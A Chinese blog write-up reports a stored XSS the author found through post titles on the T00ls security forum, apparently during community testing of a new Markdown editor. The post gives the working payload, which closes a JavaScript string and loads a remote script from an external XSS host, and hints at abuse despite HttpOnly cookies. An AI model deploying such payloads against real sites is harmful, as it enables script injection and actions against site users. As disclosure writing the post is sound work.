A-A+

土司某处储存XSS 非Markdown问题(细心会让你发现另一片天地)

2017年06月26日 17:14 漏洞安全 暂无评论 阅读 98 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

【前奏】声明:本文基本没什么技术含量,就是细心,细心,细心。因为我太粗心了,所以我想用过程提醒大家细心。事情起因是这样婶的,老君哥最近为了方便广大白帽子代码上的交流,然后使用了“Markdown”编辑器,因为安全性问题在使用这个编辑器的第一时间老君哥就发了通告,告诉广大安全友人这个编辑器会存在各种问题,要注意安全的同时也让大家集中力量找出“马克荡”的安全问题。然后看到有一些人可能因为土司的名气然后借机利用Markdown的安全问题(网上早就有相关文章)在土司成功利用后来到处宣传自己,写文章没错,也没毛病,到处宣传我觉得就有点过分了,你是在说土司怎么怎么样??还是说自己怎么怎么样???。呃。。。没办法说,每个人都不一样么毕竟,因为名气这个东西是很重要的。然后我心思拿出些些时间找找“马克荡”的编辑器的安全问题吧。测试了半天,发现老君哥似乎都修复了吧。。。找了半天毛都没找到,估测修复了吧,,,一点不给其他人玩玩的机会呀。不过在找的过程中发现了另一个有趣的储存XSS。下面就是正文。

首先,为了测试我随便编辑了一个我以前发布的帖子,在编辑的过程中,发现标题出会被某个地方所调用。如下图:

dom xss初现

看到文章页面有调用“标题”的地方。哎呦??会不会存在问题呢?然后测试一下符号吧。什么左右尖括号,什么双引号,什么单引号。最终fuzzy的结果是左右尖括号不可用,双引号不可用,个人感觉应该是html转义了。但是单引号可用。那么咱们就试试构造一下弹窗来瞧瞧。

因为是dom型XSS所以需要闭合,然后嘞。。

通过构造代码如下:

');}document.body.appendChild(document.createElement('script')).src='//gdd.gd/xss';{('

最终呢,如下图。不过要注意土司网站的cookie都是httponly的。

储存xss代码成功执行

因为土司网站是https的,所以必须加载https的,而我的网站是http的,SO。。。。

不过不要以为httponly咱们就无可奈可了,虽然cookie方面基本不用去想了,但是咱们可以通过JS做一些其他有意义的事情,具体的相信你都知道了,我就不说了。

标签:

给我留言